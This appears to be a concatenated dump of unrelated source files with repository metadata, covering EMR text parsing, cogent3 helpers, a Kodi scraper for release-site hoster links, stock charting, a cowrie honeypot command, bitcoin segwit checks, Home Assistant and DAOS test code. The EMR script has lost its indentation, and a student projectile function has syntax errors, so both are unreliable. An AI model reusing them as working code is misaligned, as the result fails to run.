emrtxts = EMRdef.txttq(u'D:\DeepLearning ER\EHR-all')#txt目录提取
for emrtxt in emrtxts:
f = open(emrtxt,'r',errors="ignore")#中文加入errors
emrtxt = os.path.basename(emrtxt)
emrtxt_str = re.findall(r'(^.+?)\_',emrtxt)#提取ID
emrtxt = "".join(emrtxt_str)#转成str
out = []
for line in f.readlines():
if line.find(r'男')>-1:
out.append('M')
if line.find(r'女')>-1:
out.append('W')
if line.find('岁')>-1:
line = re.sub('岁','',line)
lien = ''.join(line)
out.append(line)
break
output = ' '.join(out)
EMRdef.text_create(r'D:\DeepLearning ER\EHRbase','.txt' ,emrtxt,output)
| [
"1044801968@qq.com"
] | 1044801968@qq.com |
214f2c895076e8f4b959413b437dfafe392835a9 | 2f46c6463d4f871a72d4296c3dae00f029e892f1 | /src/cogent3/util/transform.py | 92b61230bf9fa8ef70c530cf4d580f2316f65502 | [
"BSD-3-Clause"
] | permissive | BrendanBeaton/cogent3 | a09376c55f24da837690219157770ad94e917579 | e10f4f933921d52b000096b7c016190a1602add6 | refs/heads/master | 2022-12-02T07:59:11.112306 | 2020-06-30T05:40:33 | 2020-06-30T05:40:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,676 | py | #!/usr/bin/env python
"""Provides transformations of functions and other objects.
Includes:
Standard combinatorial higher-order functions adapted from David Mertz (2003),
"Text Processing in Python", Chapter 1.
Functions for performing complex tests on strings, e.g. includes_any or
includes_all.
Functions for generating combinations, permutations, or cartesian products
of lists.
"""
__author__ = "Sandra Smit"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["Sandra Smit", "Rob Knight", "Zongzhi Liu"]
__license__ = "BSD-3"
__version__ = "2020.6.30a"
__maintainer__ = "Sandra Smit"
__email__ = "sandra.smit@colorado.edu"
__status__ = "Production"
maketrans = str.maketrans
# standard combinatorial HOF's from Mertz
def per_shortest(total, x, y):
    """Normalize *total* by the length of the shorter of *x* and *y*.

    Handy for per-item normalization of results computed over zipped
    sequences.  Returns 0 whenever either sequence is empty, so callers
    never hit a divide-by-zero.
    """
    denom = min(len(x), len(y))
    return total / denom if denom else 0
def per_longest(total, x, y):
    """Normalize *total* by the length of the longer of *x* and *y*.

    Handy for per-item normalization of results computed over zipped
    sequences.  Returns 0 whenever both sequences are empty, so callers
    never hit a divide-by-zero.
    """
    denom = max(len(x), len(y))
    return total / denom if denom else 0
class for_seq(object):
    """Callable that combines f(i, j) over zipped element pairs.

    ``f`` is applied to each aligned pair from the two input sequences,
    ``aggregator`` reduces the per-pair results to a scalar (default: sum),
    and ``normalizer(total, first, second)`` rescales that scalar (default:
    per_shortest, i.e. divide by the shorter input's length; pass ``None``
    to skip normalization).  zip() always truncates to the shorter input.
    """

    def __init__(self, f, aggregator=sum, normalizer=per_shortest):
        self.f = f
        self.aggregator = aggregator
        self.normalizer = normalizer

    def __call__(self, first, second):
        pair_fn = self.f
        per_pair = [pair_fn(a, b) for a, b in zip(first, second)]
        total = self.aggregator(per_pair)
        if self.normalizer is None:
            return total
        return self.normalizer(total, first, second)
# convenience functions for modifying objects
class KeepChars(object):
    """Filter object o(s): calling it returns *s* with every character not
    in *keep* removed.  Case sensitive by default.

    Rewritten around a kept-character set instead of the old byte-valued
    translate table: the old table was keyed on the UTF-8 *bytes* of
    ``keep``, so characters with ord >= 256 in the input were never
    stripped and non-ASCII ``keep`` strings were split into meaningless
    bytes.  ASCII behavior is unchanged.
    """

    # retained for backward compatibility with the original class attribute
    allchars = bytes(range(256))

    def __init__(self, keep, case_sens=True):
        """Build a filter keeping only the characters in *keep*.

        case_sens=False keeps both the lower- and upper-case forms.
        """
        if not case_sens:
            keep = keep.lower() + keep.upper()
        self._keep = frozenset(keep)

    def __call__(self, s):
        """f(s) -> s with all characters not in the keep set removed."""
        if s is None:
            raise TypeError
        if isinstance(s, bytes):
            s = s.decode("utf8")
        s = str(s)
        return "".join(c for c in s if c in self._keep)
def first_index_in_set(seq, items):
    """Return the index of the first element of *seq* found in *items*, or None."""
    return next((i for i, element in enumerate(seq) if element in items), None)
| [
"Gavin.Huttley@anu.edu.au"
] | Gavin.Huttley@anu.edu.au |
8835f0a2b179ed88083d3cd9023db727730c613c | eab0ec43806fb7f010ec0673370038f07c5ceefe | /NflmCA/venv/Scripts/easy_install-3.5-script.py | 47054a2c28778dfbb7575b04f64485242af3a66a | [] | no_license | tanaypatil/custom-django-admin | 023d915ce061a312d51d79f6b2135d744b07af15 | 5d6743468c03b642c7a059db681df3f83d71eff4 | refs/heads/master | 2020-06-13T03:53:18.067184 | 2019-06-30T14:32:19 | 2019-06-30T14:32:19 | 194,525,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | #!"C:\Users\Tanay Patil\PycharmProjects\NflmCA\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.0.1','console_scripts','easy_install-3.5'
__requires__ = 'setuptools==39.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.0.1', 'console_scripts', 'easy_install-3.5')()
)
| [
"tanaypatil197@gmail.com"
] | tanaypatil197@gmail.com |
88d35b2362956cce0f445f8acddc49bbf7f1db61 | 9a66a9acebfb324a5303f9bfe0570145e4a31554 | /plugin.video.salts/scrapers/rlshd_scraper.py | c80b28383ad7805d3086165a9b08dc1121810d5f | [] | no_license | n0490b/tdbaddon | f229e9f7b8587925cfe38acb04c5f5c70bbf1837 | 21628f1b40e2f854cc3b63acf0d632bb5daecdac | refs/heads/master | 2021-01-23T04:58:23.101284 | 2017-03-26T09:35:56 | 2017-03-26T09:35:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,007 | py | """
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import urlparse
import kodi
import log_utils # @UnusedImport
import dom_parser2
from salts_lib import scraper_utils
from salts_lib.constants import FORCE_NO_MATCH
from salts_lib.constants import VIDEO_TYPES
from salts_lib.utils2 import i18n
import scraper
BASE_URL = 'http://www.rlshd.net'
class Scraper(scraper.Scraper):
    """SALTS scraper for rlshd.net: a debrid-only, blog-style release site.
    Only episode videos are provided (see provides()).  Python 2 code.
    """
    base_url = BASE_URL

    def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
        self.timeout = timeout
        # the base url can be overridden per-scraper from addon settings
        self.base_url = kodi.get_setting('%s-base_url' % (self.get_name()))

    @classmethod
    def provides(cls):
        # this scraper only yields episode sources
        return frozenset([VIDEO_TYPES.EPISODE])

    @classmethod
    def get_name(cls):
        return 'RLSHD'

    def get_sources(self, video):
        """Return a list of hoster dicts scraped from the post matching *video*."""
        source_url = self.get_url(video)
        hosters = []
        if source_url and source_url != FORCE_NO_MATCH:
            url = urlparse.urljoin(self.base_url, source_url)
            html = self._http_get(url, require_debrid=True, cache_limit=.5)
            sources = self.__get_post_links(html, video)
            for source in sources:
                if scraper_utils.excluded_link(source): continue
                host = urlparse.urlparse(source).hostname
                hoster = {'multi-part': False, 'host': host, 'class': self, 'views': None, 'url': source, 'rating': None, 'quality': sources[source], 'direct': False}
                hosters.append(hoster)
        return hosters

    def __get_post_links(self, html, video):
        """Map stream url -> quality for each <h2><a href=...> link in the post article."""
        sources = {}
        post = dom_parser2.parse_dom(html, 'article', {'id': re.compile('post-\d+')})
        if post:
            for _attrs, fragment in dom_parser2.parse_dom(post[0].content, 'h2'):
                for attrs, _content in dom_parser2.parse_dom(fragment, 'a', req='href'):
                    stream_url = attrs['href']
                    # quality is inferred from the release name in the link url
                    meta = scraper_utils.parse_episode_link(stream_url)
                    release_quality = scraper_utils.height_get_quality(meta['height'])
                    host = urlparse.urlparse(stream_url).hostname
                    quality = scraper_utils.get_quality(video, host, release_quality)
                    sources[stream_url] = quality
        return sources

    def get_url(self, video):
        # delegate to the shared blog-style url resolver in the base class
        return self._blog_get_url(video)

    @classmethod
    def get_settings(cls):
        """Extend the base settings with a result-age filter and auto-select option."""
        settings = super(cls, cls).get_settings()
        settings = scraper_utils.disable_sub_check(settings)
        name = cls.get_name()
        settings.append(' <setting id="%s-filter" type="slider" range="0,180" option="int" label=" %s" default="30" visible="eq(-3,true)"/>' % (name, i18n('filter_results_days')))
        settings.append(' <setting id="%s-select" type="enum" label=" %s" lvalues="30636|30637" default="0" visible="eq(-4,true)"/>' % (name, i18n('auto_select')))
        return settings

    def search(self, video_type, title, year, season=''):  # @UnusedVariable
        """Search the blog for *title*; post parsing is done by the base helper."""
        html = self._http_get(self.base_url, params={'s': title}, require_debrid=True, cache_limit=1)
        # named groups url/date/post_title are consumed by _blog_proc_results
        post_pattern = 'class="entry-title">\s*<a[^>]+href="(?P<url>[^"]*/(?P<date>\d{4}/\d{1,2}/\d{1,2})/[^"]*)[^>]+>(?P<post_title>[^<]+)'
        date_format = '%Y/%m/%d'
        return self._blog_proc_results(html, post_pattern, date_format, video_type, title, year)
| [
"tdbaddon@hotmail.com"
] | tdbaddon@hotmail.com |
167a1a0bf78a1e1379f4295b09cbfeedf34b7840 | dbd87fe6e9466c4cada18b037667cfdddc62c193 | /Technical_Indicators/ZigZag.py | 057435288496ca0943ce0fe371e39f8bf6a7d9ca | [] | no_license | alexanu/Python_Trading_Snippets | 74515a40dc63ba50d95bd50330ed05d59b5dc837 | 85969e681b9c74e24e60cc524a952f9585ea9ce9 | refs/heads/main | 2023-06-25T03:27:45.813987 | 2023-06-09T16:09:43 | 2023-06-09T16:09:43 | 197,401,560 | 18 | 17 | null | 2023-02-08T22:25:25 | 2019-07-17T14:05:32 | Jupyter Notebook | UTF-8 | Python | false | false | 1,826 | py | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")
import yfinance as yf
yf.pdr_override()
import datetime as dt
# input
symbol = 'AAPL'
start = dt.date.today() - dt.timedelta(days = 365)
end = dt.date.today()
# Read data
df = yf.download(symbol,start,end)
from zigzag import *
plt.figure(figsize=(14,7))
pivots = peak_valley_pivots(df['Adj Close'].values, 0.2, -0.2)
ts_pivots = pd.Series(df['Adj Close'], index=df.index)
ts_pivots = ts_pivots[pivots != 0]
df['Adj Close'].plot()
ts_pivots.plot(style='g-o', label='ZigZag')
plt.title('Stock of ZigZag', fontsize=18)
plt.legend(loc='best')
plt.xlabel('Date')
plt.ylabel('Price')
plt.show()
# ## Candlestick with ZigZag
from matplotlib import dates as mdates
dfc = df.copy()
dfc['VolumePositive'] = dfc['Open'] < dfc['Adj Close']
#dfc = dfc.dropna()
dfc = dfc.reset_index()
dfc['Date'] = mdates.date2num(dfc['Date'].tolist())
from mplfinance.original_flavor import candlestick_ohlc
fig = plt.figure(figsize=(14,7))
ax1 = plt.subplot(111)
candlestick_ohlc(ax1,dfc.values, width=0.5, colorup='g', colordown='r', alpha=1.0)
pivots = peak_valley_pivots(df['Adj Close'].values, 0.2, -0.2)
ts_pivots = pd.Series(df['Adj Close'], index=df.index)
ts_pivots = ts_pivots[pivots != 0]
ax1.plot(df['Adj Close'])
ts_pivots.plot(style='g-o', label='ZigZag')
ax1.xaxis_date()
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%d-%m-%Y'))
ax1.grid(True, which='both')
ax1.minorticks_on()
ax1v = ax1.twinx()
colors = dfc.VolumePositive.map({True: 'g', False: 'r'})
ax1v.bar(dfc.Date, dfc['Volume'], color=colors, alpha=0.4)
ax1v.axes.yaxis.set_ticklabels([])
ax1v.set_ylim(0, 3*df.Volume.max())
ax1.set_title('Stock '+ symbol +' Closing Price')
ax1.set_ylabel('Price')
ax1.set_xlabel('Date')
ax1.legend()
plt.show() | [
"oanufriyev@gmail.com"
] | oanufriyev@gmail.com |
8d827c60eec9c54f9403584d65216617936c6c77 | a190ccac9d0ed3e0de44648957bf616c2dd88466 | /cowrie/commands/ifconfig.py | acf38c5576a8b3e6e453f1d5ebd2d6684d7332e8 | [
"BSD-2-Clause"
] | permissive | CrazyLlama/cowrie | bd0d400c22017348a7aa450841f5fb094d293a47 | 5bdf4093a34be4ede7778a171d0a84a889060c6b | refs/heads/master | 2021-01-12T11:11:29.510918 | 2018-05-01T14:55:04 | 2018-05-01T14:55:04 | 72,859,411 | 1 | 0 | null | 2018-05-01T14:55:05 | 2016-11-04T15:19:29 | Python | UTF-8 | Python | false | false | 1,395 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2014 Peter Reuterås <peter@reuteras.com>
# See the COPYRIGHT file for more information
from __future__ import division, absolute_import
from cowrie.shell.honeypot import HoneyPotCommand
# registry mapping honeypot paths to command classes
commands = {}


class command_ifconfig(HoneyPotCommand):
    """Fake ``ifconfig``: prints a canned eth0/lo report, substituting the
    honeypot's IP address and its /24 broadcast prefix into the template.
    """

    def call(self):
        # %s placeholders: the honeypot IP, then its address with the last
        # octet dropped (used to fake the broadcast address)
        l = """eth0      Link encap:Ethernet  HWaddr 04:01:16:df:2d:01
          inet addr:%s  Bcast:%s.255  Mask:255.255.255.0
          inet6 addr: fe80::601:16ff:fedf:2d01/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:139435762 errors:0 dropped:0 overruns:0 frame:0
          TX packets:116082382 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:102191499830 (102.1 GB)  TX bytes:68687923025 (68.6 GB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:110 errors:0 dropped:0 overruns:0 frame:0
          TX packets:110 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:19932 (19.9 KB)  TX bytes:19932 (19.9 KB)""" % \
            (self.protocol.kippoIP,
             self.protocol.kippoIP.rsplit('.', 1)[0])
        self.write(l+'\n')


commands['/sbin/ifconfig'] = command_ifconfig
# vim: set sw=4 et:
| [
"michel@oosterhof.net"
] | michel@oosterhof.net |
88c9be39ef89d55c1845d93bf1e0875f8696b53b | 11aa417a375023da34224b9cb8c46f75c8753f6f | /aiobitcoin/tools/tx/script/segwit.py | 282f53ae10a5eec4de3a0a7dc8a5d87769d76174 | [
"MIT"
] | permissive | mkbeh/aiobitcoin | 426a1be16c9b7d7150a164fff553296988961625 | 1cc9121a292208600b1631a709917c82a1238964 | refs/heads/master | 2023-08-07T15:11:41.892153 | 2021-07-11T11:05:29 | 2021-07-11T11:05:29 | 185,234,495 | 1 | 2 | MIT | 2023-07-20T15:09:24 | 2019-05-06T16:36:30 | Python | UTF-8 | Python | false | false | 5,230 | py | # -*- coding: utf-8 -*-
"""
Parse, stream, create, sign and verify Bitcoin transactions as Tx structures.
The MIT License (MIT)
Copyright (c) 2017 by Richard Kiss
Copyright (c) 2019 July by mkbeh
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from hashlib import sha256
from ...intbytes import byte2int, indexbytes
from .flags import (
VERIFY_P2SH, VERIFY_DISCOURAGE_UPGRADABLE_WITNESS_PROGRAM
)
from . import errno
from . import opcodes
from . import ScriptError
from .Stack import Stack
from .eval_script import eval_script
from .tools import bin_script, bool_from_script_bytes
def witness_program_version(script):
l = len(script)
if l < 4 or l > 42:
return None
first_opcode = byte2int(script)
if indexbytes(script, 1) + 2 != l:
return None
if first_opcode == opcodes.OP_0:
return 0
if opcodes.OP_1 <= first_opcode <= opcodes.OP_16:
return first_opcode - opcodes.OP_1 + 1
return None
def check_witness_program_v0(
witness, script_signature, flags, signature_for_hash_type_f,
lock_time, expected_hash_type, traceback_f, tx_sequence, tx_version):
l = len(script_signature)
if l == 32:
if len(witness) == 0:
raise ScriptError("witness program empty", errno.WITNESS_PROGRAM_WITNESS_EMPTY)
script_public_key = witness[-1]
if sha256(script_public_key).digest() != script_signature:
raise ScriptError("witness program mismatch", errno.WITNESS_PROGRAM_MISMATCH)
stack = Stack(witness[:-1])
elif l == 20:
# special case for pay-to-pubkeyhash; signature + pubkey in witness
if len(witness) != 2:
raise ScriptError("witness program mismatch", errno.WITNESS_PROGRAM_MISMATCH)
# "OP_DUP OP_HASH160 %s OP_EQUALVERIFY OP_CHECKSIG" % b2h(script_signature))
script_public_key = b'v\xa9' + bin_script([script_signature]) + b'\x88\xac'
stack = Stack(witness)
else:
raise ScriptError("witness program wrong length", errno.WITNESS_PROGRAM_WRONG_LENGTH)
return stack, script_public_key
def check_witness_program(
witness, version, script_signature, flags, signature_for_hash_type_f,
lock_time, expected_hash_type, traceback_f, tx_sequence, tx_version):
if version == 0:
stack, script_public_key = check_witness_program_v0(
witness, script_signature, flags, signature_for_hash_type_f,
lock_time, expected_hash_type, traceback_f, tx_sequence, tx_version)
elif flags & VERIFY_DISCOURAGE_UPGRADABLE_WITNESS_PROGRAM:
raise ScriptError(
"this version witness program not yet supported", errno.DISCOURAGE_UPGRADABLE_WITNESS_PROGRAM)
else:
return
for s in stack:
if len(s) > 520:
raise ScriptError("pushing too much data onto stack", errno.PUSH_SIZE)
eval_script(script_public_key, signature_for_hash_type_f.witness, lock_time, expected_hash_type,
stack, traceback_f=traceback_f, flags=flags, is_signature=True,
tx_sequence=tx_sequence, tx_version=tx_version)
if len(stack) == 0 or not bool_from_script_bytes(stack[-1]):
raise ScriptError("eval false", errno.EVAL_FALSE)
if len(stack) != 1:
raise ScriptError("stack not clean after evaluation", errno.CLEANSTACK)
def check_witness(stack, script_public_key, script_signature, witness, witness_flags, signature_for_hash_type_f,
lock_time, expected_hash_type, traceback_f, tx_sequence, tx_version):
witness_version = witness_program_version(script_public_key)
had_witness = False
if witness_version is not None:
had_witness = True
witness_program = script_public_key[2:]
if len(script_signature) > 0:
err = errno.WITNESS_MALLEATED if witness_flags & VERIFY_P2SH else errno.WITNESS_MALLEATED_P2SH
raise ScriptError("script sig is not blank on segwit input", err)
check_witness_program(
witness, witness_version, witness_program, witness_flags,
signature_for_hash_type_f, lock_time, expected_hash_type,
traceback_f, tx_sequence, tx_version)
stack[:] = stack[-1:]
return had_witness
| [
"mkbehforever@gmail.com"
] | mkbehforever@gmail.com |
8417118ad2daf826e674008968ff8e3a4da089ce | 5d65f00e3fb6c84779f14ec0be852f1da285aec2 | /homeassistant/components/netatmo/light.py | 6fe5e84e65af8351faa316f63b4a175b99cb531c | [
"Apache-2.0"
] | permissive | Shahzad6077/core | b448ff00ef4fed131c70c0671635b7b4c62dd23d | e0873493e2f77e9702601969712f6d2c1536aaef | refs/heads/master | 2023-07-09T18:11:20.778850 | 2021-08-16T03:49:10 | 2021-08-16T03:49:10 | 397,514,065 | 2 | 0 | Apache-2.0 | 2021-08-18T07:36:53 | 2021-08-18T07:36:53 | null | UTF-8 | Python | false | false | 5,010 | py | """Support for the Netatmo camera lights."""
from __future__ import annotations
import logging
from typing import cast
import pyatmo
from homeassistant.components.light import LightEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import (
DATA_HANDLER,
DOMAIN,
EVENT_TYPE_LIGHT_MODE,
MANUFACTURER,
SIGNAL_NAME,
WEBHOOK_LIGHT_MODE,
WEBHOOK_PUSH_TYPE,
)
from .data_handler import CAMERA_DATA_CLASS_NAME, NetatmoDataHandler
from .netatmo_entity_base import NetatmoBase
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up the Netatmo camera light platform."""
if "access_camera" not in entry.data["token"]["scope"]:
_LOGGER.info(
"Cameras are currently not supported with this authentication method"
)
return
data_handler = hass.data[DOMAIN][entry.entry_id][DATA_HANDLER]
await data_handler.register_data_class(
CAMERA_DATA_CLASS_NAME, CAMERA_DATA_CLASS_NAME, None
)
data_class = data_handler.data.get(CAMERA_DATA_CLASS_NAME)
if not data_class or data_class.raw_data == {}:
raise PlatformNotReady
all_cameras = []
for home in data_handler.data[CAMERA_DATA_CLASS_NAME].cameras.values():
for camera in home.values():
all_cameras.append(camera)
entities = [
NetatmoLight(
data_handler,
camera["id"],
camera["type"],
camera["home_id"],
)
for camera in all_cameras
if camera["type"] == "NOC"
]
_LOGGER.debug("Adding camera lights %s", entities)
async_add_entities(entities, True)
class NetatmoLight(NetatmoBase, LightEntity):
"""Representation of a Netatmo Presence camera light."""
def __init__(
self,
data_handler: NetatmoDataHandler,
camera_id: str,
camera_type: str,
home_id: str,
) -> None:
"""Initialize a Netatmo Presence camera light."""
LightEntity.__init__(self)
super().__init__(data_handler)
self._data_classes.append(
{"name": CAMERA_DATA_CLASS_NAME, SIGNAL_NAME: CAMERA_DATA_CLASS_NAME}
)
self._id = camera_id
self._home_id = home_id
self._model = camera_type
self._device_name: str = self._data.get_camera(camera_id)["name"]
self._attr_name = f"{MANUFACTURER} {self._device_name}"
self._is_on = False
self._attr_unique_id = f"{self._id}-light"
async def async_added_to_hass(self) -> None:
"""Entity created."""
await super().async_added_to_hass()
self._listeners.append(
async_dispatcher_connect(
self.hass,
f"signal-{DOMAIN}-webhook-{EVENT_TYPE_LIGHT_MODE}",
self.handle_event,
)
)
@callback
def handle_event(self, event: dict) -> None:
"""Handle webhook events."""
data = event["data"]
if not data.get("camera_id"):
return
if (
data["home_id"] == self._home_id
and data["camera_id"] == self._id
and data[WEBHOOK_PUSH_TYPE] == WEBHOOK_LIGHT_MODE
):
self._is_on = bool(data["sub_type"] == "on")
self.async_write_ha_state()
return
@property
def _data(self) -> pyatmo.AsyncCameraData:
"""Return data for this entity."""
return cast(
pyatmo.AsyncCameraData,
self.data_handler.data[self._data_classes[0]["name"]],
)
@property
def available(self) -> bool:
"""If the webhook is not established, mark as unavailable."""
return bool(self.data_handler.webhook)
@property
def is_on(self) -> bool:
"""Return true if light is on."""
return self._is_on
async def async_turn_on(self, **kwargs: dict) -> None:
"""Turn camera floodlight on."""
_LOGGER.debug("Turn camera '%s' on", self.name)
await self._data.async_set_state(
home_id=self._home_id,
camera_id=self._id,
floodlight="on",
)
async def async_turn_off(self, **kwargs: dict) -> None:
"""Turn camera floodlight into auto mode."""
_LOGGER.debug("Turn camera '%s' to auto mode", self.name)
await self._data.async_set_state(
home_id=self._home_id,
camera_id=self._id,
floodlight="auto",
)
@callback
def async_update_callback(self) -> None:
"""Update the entity's state."""
self._is_on = bool(self._data.get_light_state(self._id) == "on")
| [
"noreply@github.com"
] | Shahzad6077.noreply@github.com |
9d8946b7ca19fe0c6393b5f6a2dde7d406919cd9 | 78f3fe4a148c86ce9b80411a3433a49ccfdc02dd | /2015/09/college-scorecard-laitinen-20150916/graphic_config.py | beb761cd07fa41c1aada464419435120c5b3c263 | [] | no_license | nprapps/graphics-archive | 54cfc4d4d670aca4d71839d70f23a8bf645c692f | fe92cd061730496cb95c9df8fa624505c3b291f8 | refs/heads/master | 2023-03-04T11:35:36.413216 | 2023-02-26T23:26:48 | 2023-02-26T23:26:48 | 22,472,848 | 16 | 7 | null | null | null | null | UTF-8 | Python | false | false | 1,049 | py | #!/usr/bin/env python
import base_filters
from math import trunc
COPY_GOOGLE_DOC_KEY = '1AOxvgIztKDd-GOVZjx11dRjmRadr47wXUsDUMS2awJw'
USE_ASSETS = False
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
def breaks(n):
n = float(n)
if (n >= 200):
return 'plus200'
elif (n >= 150):
return 'plus150'
elif (n >= 100):
return 'plus100'
elif (n >= 50):
return 'plus50'
else:
return 'plus0'
def format_currency(value):
return "{:,.1f}".format(float(value)/1000) + "k"
def format_score(value):
return "{:.2f}".format(float(value))
def format_rank(value):
floated = trunc(float(value))
return floated
def format_percent(value):
return "{0:.00f}".format(float(value)*100)
def format_percent2(value):
return "{0:.1f}".format(float(value)*100)
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS + [format_currency] + [format_rank] + [format_percent] + [format_score] + [format_percent2]
| [
"ahurt@npr.org"
] | ahurt@npr.org |
2630419c2c16f7fafecd89941409cee861476904 | 1efd2de8bf77ec00eb2fcaf5749278495946d920 | /src/tests/ftest/util/dbench_utils.py | 897f77efe1395dadb573a482c8594d04f951011e | [
"BSD-2-Clause",
"BSD-2-Clause-Patent"
] | permissive | daos-stack/daos | 6f55bf3061fd830d5b8d28506e1295e2d3a27c38 | ed5eed5df43a68571afe123132a743824c02637a | refs/heads/master | 2023-08-31T21:43:37.606145 | 2023-08-31T16:38:00 | 2023-08-31T16:38:00 | 69,390,670 | 631 | 300 | NOASSERTION | 2023-09-14T18:55:15 | 2016-09-27T19:21:29 | C | UTF-8 | Python | false | false | 2,879 | py | """
(C) Copyright 2019-2023 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
from command_utils_base import FormattedParameter
from command_utils_base import BasicParameter
from command_utils import ExecutableCommand
from job_manager_utils import Mpirun
# pylint: disable=too-few-public-methods,too-many-instance-attributes
class DbenchCommand(ExecutableCommand):
"""Defines a object representing a dbench command."""
def __init__(self, namespace, command):
"""Create a dbench Command object."""
super().__init__(namespace, command)
# dbench options
self.timelimit = FormattedParameter("--timelimit {}")
self.loadfile = FormattedParameter("--loadfile {}")
self.directory = FormattedParameter("--directory {}")
self.tcp_options = FormattedParameter("--tcp-options {}")
self.target_rate = FormattedParameter("--target-rate {}")
self.sync = FormattedParameter("--sync", False)
self.fsync = FormattedParameter("--fsync", False)
self.xattr = FormattedParameter("--xattr", False)
self.no_resolve = FormattedParameter("--no-resolve", False)
self.clients_per_process = FormattedParameter(
"--clients-per-process {}")
self.one_byte_write_fix = FormattedParameter(
"--one-byte-write-fix", False)
self.stat_check = FormattedParameter("--stat-check", False)
self.fake_io = FormattedParameter("--fake-io", False)
self.skip_cleanup = FormattedParameter("--skip-cleanup", False)
self.per_client_results = FormattedParameter(
"--per-client-results", False)
self.num_of_procs = BasicParameter(None)
def get_param_names(self):
"""Overriding the original get_param_names."""
param_names = super().get_param_names()
# move key=num_of_procs to the end
param_names.sort(key='num_of_procs'.__eq__)
return param_names
class Dbench(DbenchCommand):
"""Class defining an object of type DbenchCommand."""
def __init__(self, hosts, tmp):
"""Create a dbench object."""
super().__init__("/run/dbench/*", "dbench")
# set params
self.hosts = hosts
self.tmp = tmp
def run(self, processes=1):
# pylint: disable=arguments-differ
# pylint: disable=arguments-renamed
"""Run the dbench command.
Args:
processes: mpi processes
Raises:
CommandFailure: In case dbench run command fails
"""
self.log.info('Starting dbench')
# Get job manager cmd
mpirun = Mpirun(self, mpi_type="mpich")
mpirun.assign_hosts(self.hosts, self.tmp)
mpirun.assign_processes(processes)
mpirun.exit_status_exception = True
# run dbench
out = mpirun.run()
return out
| [
"noreply@github.com"
] | daos-stack.noreply@github.com |
9893f64592146bbf9aa0045526733414bc2fe78e | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_217/ch19_2019_03_26_19_01_39_954573.py | eb141b3e1ed996df46b165c1f995431f0b7a5452 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | import math
def calcula_distancia_do_projetil(v,an,yo):
d= (v**2)/(2*9,8*)(1+(1+(2*9,8*yo)/(v**2)*((sin(an))**2))*sin(2*an)
retun d | [
"you@example.com"
] | you@example.com |
9ca6261bf93b240faa6581bb150d113d8fdacb75 | dbe5973d69df9c5a5f3b06b7451a0de7086ebda4 | /myapps/catalogue/migrations/0016_remove_product_price.py | 42b33265e0b7f36f5617d40c3801e771e1b10d5d | [] | no_license | phares/mall | 29e7c0fdf3222a05161de36c8252167ab59df7be | d3f0093828c892ce46d55afaa245e5780555cc68 | refs/heads/master | 2021-01-22T23:53:27.535609 | 2017-04-30T09:17:53 | 2017-04-30T09:17:53 | 85,676,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-04-13 08:45
from __future__ import unicode_literals
